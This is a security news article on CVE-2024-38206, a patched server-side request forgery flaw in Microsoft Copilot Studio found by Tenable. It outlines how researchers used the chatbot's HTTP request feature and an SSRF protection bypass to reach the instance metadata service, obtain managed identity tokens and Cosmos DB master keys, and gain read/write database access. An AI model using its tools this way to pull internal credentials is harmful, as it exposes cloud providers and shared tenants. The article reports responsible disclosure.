Copilot Studio Vulnerability Exploited to Access Sensitive Information


Microsoft has patched a critical vulnerability in its Copilot Studio tool that allowed researchers to access sensitive internal cloud data and services. The flaw tracked as CVE-2024-38206, was discovered by cybersecurity firm Tenable and has been described as a server-side request forgery (SSRF) issue.

Copilot Studio, built on Microsoft’s Power Platform, allows users to create custom AI chatbots that can perform various tasks using data from Microsoft 365 and other connected sources. One feature of Copilot Studio is the ability to make HTTP requests triggered by specific user phrases.

EHA

Copilot Studio Vulnerability Exploited to Access Sensitive Information
HTTP Request

Tenable researchers found that by leveraging this HTTP request functionality, combined with an SSRF protection bypass, they could access Microsoft’s internal infrastructure for Copilot Studio. This included the Instance Metadata Service (IMDS) and internal Cosmos DB databases.

Free Webinar on Detecting & Blocking Supply Chain Attack -> Book your Spot

Using their exploit, the researchers retrieved instance metadata, including managed identity access tokens, through Copilot chat messages. These access tokens could then be used to access other internal Microsoft cloud resources.

Copilot Studio Vulnerability Exploited to Access Sensitive Information

For example, the researchers gained read/write access to an internal Cosmos DB instance by generating valid authorization tokens using the Cosmos DB master keys obtained through the IMDS.

While this particular database was only accessible to Microsoft’s internal infrastructure, the researchers’ Copilot instance was able to access it by crafting requests with the appropriate headers.

Cross-Tenant Impact and Swift Mitigation

Although Tenable did not find any immediately accessible cross-tenant data, they noted that the Copilot Studio infrastructure was shared among different customers. This means that any impact on the underlying systems could potentially affect multiple Copilot Studio tenants.

After being notified of the vulnerability, Microsoft quickly addressed it. The company assigned it CVE-2024-38206 and evaluated it as a critical information disclosure flaw. Microsoft stated that the vulnerability has been fully mitigated, and no customer action is required.

The discovery of this SSRF vulnerability in Copilot Studio highlights the potential risks associated with AI-powered cloud services that can make external HTTP requests.

As these tools become more sophisticated and integrated with sensitive enterprise data, robust security measures, and regular auditing will be crucial to prevent unauthorized access and data leakage.

While Microsoft has addressed this particular flaw, the growing complexity of generative AI systems demands ongoing vigilance from both service providers and their customers.

Are you from SOC and DFIR Teams? Analyse Malware Incidents & get live Access with ANY.RUN -> Get 14 Days Free Acces



Source link